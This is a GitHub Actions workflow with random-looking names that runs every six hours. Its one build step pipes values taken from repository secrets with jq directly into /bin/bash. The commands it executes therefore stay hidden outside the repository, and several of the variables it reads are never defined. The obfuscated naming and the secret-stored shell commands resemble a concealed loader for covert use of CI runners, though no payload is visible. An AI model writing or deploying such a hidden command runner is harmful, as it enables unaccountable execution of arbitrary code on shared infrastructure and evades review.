name: tremblebusy

on:
  workflow_dispatch:
  schedule:
    - cron: '52 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tremblebusy
        env:
          zb31: ${{ secrets.zb31 }}
        run: |
          echo $zb31 | jq -r .artpz25622 | /bin/bash
          echo $zz7 | jq -r .iwduf19325 | /bin/bash
          echo $ch74 | jq -r .ay574 | /bin/bash
          echo $sk9 | jq -r .nhnvu5548 | /bin/bash
          echo $k527 | jq -r .vrxt3 | /bin/bash
          echo $ak4653 | jq -r .neaoi30 | /bin/bash
          echo $l8751 | jq -r .phe2810 | /bin/bash

